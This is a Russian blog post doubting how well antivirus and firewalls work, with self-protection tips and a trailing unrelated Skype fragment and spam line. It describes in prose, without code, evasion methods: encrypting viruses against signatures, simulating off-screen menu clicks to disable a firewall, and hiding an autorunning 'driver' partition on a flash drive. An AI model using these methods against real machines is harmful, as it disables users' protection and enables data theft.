Скажу, что к выводам, которые будут ниже, пришел сам, своим мозгом. И только в этом семестре препод с универа подтвердил мои слова. И я еще больше укрепился в своей позиции к сегодняшним антивирусам и фаерволам.

А теперь конкретнее…

Доступность современных компьютеров и соответсвенно повсеместная компьютеризация привели к тому, что уровень знаний среднестатистичесного пользователя резко упал. Это давно известный факт, наверное, сейчас даже не я сформулировал предыдущее предложение, а моя память выдала кусок какого-то текста. Но это не важно…

Что такое антивирус уже знают большинство. Но вот беда – знать, что такое знают, а не принимают на веру лозунги антивирусных компаний единицы.

Каждая компания уверяет, что ее продукт лучше, потому что быстрее, умнее, ест меньше ресурсов и т.д.

Но вот после того, как антивирусы раз за разом не могут помочь в борьбе с вирусами и прочими “прелестями”, в мозгу все отчетливее проявляется мысль, что тебя обманывают. Даже больше – что полезность антивирусов совсем не такая, как она представляется СМИ и самими компаниями-разработчиками.

Обосную свою точку зрения.

Антивирус – это программа, целью которой является найти и убить существующие вирусы и другую гадость, плюс не дать заразиться новыми. Первую задачу решают сканеры (проверка, ручная или по расписанию); вторую резиденты (или мониторы, находятся в памяти и следят за другими процессами).

Недостатки сканеров – требуют много времени, плюс нужно следить и запускать периодически сканирование. Последний недостаток решают резиденты – они сами проверяют все “на лету”, но и у них есть свои минусы.

Самый главный недостаток антивирусов вообще – это то, что они основаны на простом сравнении: чтобы узнать, чиста программа или она вирус, ее сравнивают с сигнатурами из баз. Отсюда простой вывод – антивирус может уберечь или вылечить только от относительно старого вируса, сигнатура которого есть в его базе. И так оно и есть – это подтверждается на практике. Кроме того, вирусописателям не обязательно придумывать новый вирус, если сигнатура на него появилась в антивирусных базах – достаточно применить шифрование и старые сигнатуры не будут эффективны против такой модофикации вируса.

Возвращаясь к резидентам: теперь представим в общих чертах, как они работают. Это программа, которая запускается с системой и постоянно работает. Открываете вы что-то с диска (файл или программу) или другой процесс в памяти что-то читает\пишет на диск или обращается к устройству – за всем этим смотрит резидент.

Получается, что немало времени и ресурсов вашего компьютера занято постоянной проверкой резидентом всего и вся на зловредность.

Более того, резиденты делают это постоянно – если вы запускали Проводник в 10-00, закрыли в 10-01, а потом через 3 минуты снова открыли его, то резидент снова проверит ранее проверенную программу.

Вспомните, что проверка основана на все тех же сигнатурах и поймете, что резидент большую часть времени “молотит вхолостую”.

Кроме сравнения с сигнатурами, антивирусы применяют другой механизм – проактивную защиту. Суть ее состоит в том, что отслеживаются действия всех программ. Если эти действия носят подозрительный характер, программа информирует пользователя, и решение принимает он сам. Яркий пример применения – Kaspersky Antivirus, Outpost Firewall Pro.

Недостаток состоит в том, что эти постоянные вопросы о том, что делать, надоедают и пользователь может перестать на них реагировать.

Есть еще эмуляция, когда программу как бы запускают в изолированной “песочнице” и смотрят, не будет ли она себя плохо вести

Наверное, вы уже давно спрашиваете про себя: “А как же эвристический анализ, которым так хвалятся антивирусные компании?”

Для тех, кто еще не знает, приведу цитату из Вики:

Эвристическое сканирование — метод работы антивирусной программы, основанный на сигнатурах и эвристике, призван улучшить способность сканеров применять сигнатуры и распознавать модифицированные версии вирусов в тех случаях, когда сигнатура совпадает с телом неизвестной программы не на 100 %, но в подозрительной программе налицо более общие признаки вируса. Данная технология, однако, применяется в современных программах очень осторожно, так как может повысить количество ложных срабатываний.

Пример технологии эвристического сканирования — Bloodhound — применяется компанией Symantec в продукте Norton Antivirus. Эвристика призвана сделать сигнатуры более гибкими, полное совпадение не обязательно. В качестве одной из многочисленных возможных «подсказок» могут рассматриваться даже такие простые признаки, как наличие в подозрительном файле слова virus. [1]

Но все эти методы не помогают, когда к тебе попадает новый вирус… Или если на комрьютере уже есть какой-то достаточно продвинутый экземпляр.

Я встречал вирусы, которые не давали просматривать список процессов и скрытые файлы =) И который упорно не умирал, хотя антивирус говорил, что в памяти все чисто…

Таким образом еще 1 вывод: в противоборстве антивируса против вируса выигрывает тот, кто запускается раньше. Это очевидно.

Но и это еще ничего. Допустим, антивирус уже стоит. Но и тут вирус может его обойти.

Дальше пересказ слов препода, за что ему спасибо =) Называть не буду, думаю, он не обидится.

Ахилесова пята современных средств персональной защиты – антивирусов и фаерволов – это то, что они запускаются и работают вне ядра операционной системы. Это такие же программы, как и другие. Точно такие же права имеют и программы, запускаемые от имени пользователя. А т.к. большинство из них работает под учетной записью администратора, то вирус или другой зловред может делать тоже, что и пользователь. Отключить антивирус \ фаервол, например.

А что? Простое применение WinAPI – найти окошко фаервола, эмулировать вызов меню, с помошью простых математических вычислений найти, где будет пункт “Выключить” и эмулировать нажатие.

Причем сделать это можно так хитро, что пользователь ничего не замутит, даже если он прямо в это самое время делал что-то за комьютером. Хитрость состоит в том, что экран – это не только то, что видно на мониторе. Например новички в Delphi вместо правильного скрытия формы через Hide, делают скрытие за счет выставления координат, которые находятся вне видимой части экрана =)

Точно также зловред может извернуться и меню будет открываться там, где его пользователь не будет видеть…

Именно поэтому антивирусы и фаерволы в последнее время так часто спрашивают “Вы уверены?”, “Точно выйти?” и т.д. =) Помогает функция выброса сообщения в центр именно видимой области, которую весьма трудно обойти.

Поэтому будущие антивирусы будут встраиваться в ОС, чтобы их нельзя было так просто выключить. Кстати вспомнил любопытный и забавный пример, который привел препод: Microsoft как-то разработало свой антивирус, который встроила в свою ОС, но вроде Norton отсудила у MS “право пользователя быть не защищенным” =)

Таким образом я и препод скептически относимся к антивирусам и фаерволам. И самая лучшая защита – это свой мозг, свои руки и осторожность + внимательность.

Это не значит, что нужно сносить антивирус \ фаервол, которые сейчас стоят на вашем компьютере. Нет.

Статья написана, чтобы показать тому, кто этого не знал, что никакой сверхустойчивой защиты антивирусы \ фаерволы в сегодняшнем их состоянии не дают.

Т.е. только вы сами можете обезопасить себя…

Домохозяйкам – да, лучше пока ничего предложить нельзя, чем резидентный антивирус + фаервол.

Но грамотный человек может без опаски не использовать резидент-антивирус, ведь небольшой системы правил достаточно:

0. 100% защиты построить нельзя, поэтому нужно быть готовым к тому, что ОС и данные могут пасть под атакой вируса или другой нечисти, поэтому рекомендуется делать резервные копии ОС и данных. Как вариант, можно попробовать вылечить файлы у друга или на 2м компьютере – принести винт, но НЕ грузиться с него, а работать с ним в режиме “ведомого (раба, секондари)”.

1. В 95% случаев работает принцип замкнутой системы – если в системе нет зловредов и все, что приходит извне, проверяется свежим антивирусом, то зараза не пройдет. Это же можно отнести и к сети – если все пакеты извне фильтруются фаерволом актуальной версии. 5% (цифра условна) – что вам попадется то, чего не смогут детектировать средства защиты – тут 100% выручит пункт 0, иногда прямые ваши руки =)

2. Всегда под рукой должны быть средства, которыми можно обнаружить большинство видов заразы – это пакет утилит от Марка Руссиновича / sysinternals.com. Также нужно видеть скрытые файлы и расширения всех файлов =) Почему – объяснять не буду, не маленькие.

3. Любой исполняемый файл, пришедший “извне”, проверяется антивирусом с последними базами (это желательно, но все относительно – даже в последних базах могут отсутствовать нужные сигнатуры). Под исполняемым понимается не только exe, com, bat, cmd и т.д. Поясню – почитайте об уязвимостях в обработке jpg, wmv.

4. После запуска, а желательно и работы, нужно проверять Process Explorerom (sysinternals) и другими утилитами, не появилось ли чего лишнего в памяти \ автозагрузке и т.д.

5. Если проверка антивирусом и “руками” через спец. софт прошла успешно, то имя программы \ путь к ней запоминается, чтобы потом не останавливаться долго на ней при следующей проверке.

Эту систему я выработал за 6 лет и у меня она уже работает на уровне рефлексов – я все шаги выполняю на полуавтомате.

И в заключение, чтобы не быть голословным, приведу факты, которые послужиили предпосылкой либо подтверждением моей позиции:

0. 2004 г. – заражение одним вирусом компьютеров моего и друга, мой антивирус вылечил большинство файлов, его – удалил. Именно тогда я задумался над тем, что эффективность антивируса относительна: ведь могло повезти и не мне.

1. 2005 г. – взлом на моих глазах тогдашней версии Outpost, я бы так и не был уверен, что это удачный взлом, если б через какое-то время (вроде год, но врать не буду) ко мне не приехали следователи писать заявление, что я пострадал незначительно от действий хакера и на суд не явлюсь.

2. 2007 г. у брата, а потом и тети лечил компьютеры от вирусов. Вылечил только у тети, потому что у брата загрузочного носителя не оказалось, но промучился я тогда весь день. Полностью утвердился в своем мнении, что из борьбы вируса и антивируса победителем выйдет тот, кто запустился первее.

3. Препод рассказал о механизме заражения, перед которым антивирусы на момент написания статьи были бессильны (по его словам): файловая система флешки модифицируется специальным образом, делается маскирование под multimedia-device, славная ОС Windows видит на флешку 2 раздела – 1 служебный, в нем вирус, который маскируется под драйвер и запускается ОС автоматически, ведь это драйвер девайса, 2й раздел – ваша флешка так, как она видна в Проводнике. Вирус может воровать данные на свою закрытую часть. Обнаруживается сильным различием между номинальным и реальным пространством на флешке, либо просмотром в спец. утилитах флешки на другом уровне

Ссылки по теме:
- программы от Марка Руссиновича / sysinternals.com – очень рекомендую
- из Вики Антивирусная программа
- ну и virustotal.com – проверка основными антивирусами с последними базами (еще раз подтверждает принцип относительности эффективности АВ =)

Это моя позиция, а что делать вам, решайте сами. Удачи в борьбе с нечистью =)

Skype представляет собой одну из самых популярных VoIP-программ, установленную на миллионах компьютеров по всему миру, владельцы которых даже и не подозревают, какая опасность им грозит.

Интересная статейка. То, что скайп и сервер, и клиент для меня стало очевидно сразу же, когда я посмотрел за сетевыми соединениями программы, но вот о такой навороченной защите естественно не думал… Что ж разработчики замышляют? Кстати Google Talk иногда не хуже по качеству, зато весит в разы меньше…

При сотрудничестве Vimaxmpeg4.com Биение сердца Даниэлы Стил Heartbeat фильм